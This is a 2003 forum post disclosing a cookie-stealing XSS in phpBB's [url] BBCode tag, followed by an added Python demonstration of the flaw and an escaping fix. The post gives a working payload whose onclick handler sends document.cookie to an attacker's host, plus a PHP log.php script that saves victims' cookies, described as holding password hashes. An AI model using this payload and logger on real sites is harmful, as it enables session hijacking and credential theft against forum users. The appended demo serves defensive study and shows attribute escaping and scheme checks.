EvilGod
Sep 13 2003, 11:13 AM
Sorry in advance for my bad English, but I'm Italian.

OK, I installed the latest phpBB release on my own system and tried this out: it works.
If the phpBB HTML option is "ON", you can execute JavaScript using the [URL] tag.
We can use this vulnerability for cookie stealing.
EXAMPLE: Create a new post and insert a link in this way:
| CODE |
[url=http://www.google.it" onclick="window.location='http://your.phpsite.com/log.php?'+document.cookie"]Link_text[/url]
|
"log.php" will write the cookie of the user who clicks on this link into a text file.
--- EXAMPLE OF LOG.PHP ---
| CODE |
<?php
// Append the victim's cookie (sent as the query string) to a text file
$fd = fopen("cookie.txt", "a+") or die("can't open file!");
fwrite($fd, $_SERVER['QUERY_STRING'] . "\n"); // $_SERVER replaces the register_globals-only $QUERY_STRING
fclose($fd);
?>
|
--- END OF LOG.PHP ---
In the cookie file we will find the encrypted (MD5, I think) password of the phpBB account.
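Added example, not part of the post above and not phpBB's code: a minimal stand-in BBCode [url] converter that shows why the payload works (the `"` inside `[url=...]` closes the href attribute, so `onclick=` becomes a real attribute), beside a hardened version that entity-encodes the attribute value and refuses non-http(s) schemes. The payload string is the one from the post, embedded inline; the converter, the function names and the HTML-parser check are assumptions made for this demo. Python's own `html.parser` is used as a stand-in for the browser, so the check reports the attributes the victim's browser would actually see rather than matching text with a regex.

```python
"""Demo (not phpBB code): attribute injection through [url=...] and its fix."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# [url=<target>]<label>[/url]; non-greedy so the first ']' ends the target
URL_TAG = re.compile(r"\[url=(.*?)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)

# Constructed sample input: the payload from the post above
PAYLOAD = ('[url=http://www.google.it" onclick="window.location='
           "'http://your.phpsite.com/log.php?'+document.cookie\"]Link_text[/url]")


def bbcode_url_naive(text: str) -> str:
    """Vulnerable stand-in: the target is dropped into href unescaped, so a
    double quote inside [url=...] ends the href value and anything after it
    (onclick=..., onmouseover=...) is parsed as further attributes."""
    return URL_TAG.sub(lambda m: f'<a href="{m.group(1)}">{m.group(2)}</a>', text)


def bbcode_url_safe(text: str) -> str:
    """Hardened stand-in: only http(s) targets become links, and both the
    target and the label are entity-encoded (quotes included), so the
    attacker's '"' stays inside the href value instead of closing it."""
    def repl(m: re.Match) -> str:
        target, label = m.group(1), m.group(2)
        try:
            scheme = urlsplit(target).scheme.lower()
        except ValueError:
            scheme = ""  # unparsable target: treat as not a URL
        if scheme not in ("http", "https"):
            # refuse javascript:, data:, vbscript: etc.; keep the label as text
            return html.escape(label, quote=True)
        return (f'<a href="{html.escape(target, quote=True)}">'
                f'{html.escape(label, quote=True)}</a>')
    return URL_TAG.sub(repl, text)


class _AnchorCollector(HTMLParser):
    """Collects the attributes of every <a> exactly as an HTML parser sees them."""
    def __init__(self) -> None:
        super().__init__()
        self.anchors: list = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "a":
            self.anchors.append(dict(attrs))


def anchor_attributes(rendered: str) -> list:
    """Return one dict of attributes per <a> tag in the rendered HTML.
    A parser, not a regex, decides what counts as an attribute: in the
    escaped output 'onclick=' is just text inside the href value."""
    p = _AnchorCollector()
    p.feed(rendered)
    p.close()
    return p.anchors


if __name__ == "__main__":
    for name, render in (("naive", bbcode_url_naive), ("safe", bbcode_url_safe)):
        out = render(PAYLOAD)
        print(f"--- {name} ---\n{out}")
        print("attributes the browser sees:", sorted(anchor_attributes(out)[0]))
```

Run it and the naive rendering shows an anchor carrying both `href` and `onclick`, while the hardened rendering produces an anchor whose only attribute is `href` (with the whole payload harmlessly inside it). The same escaping must be applied to every BBCode tag that lands in an attribute ([img], [color], [size] and so on), not only [url].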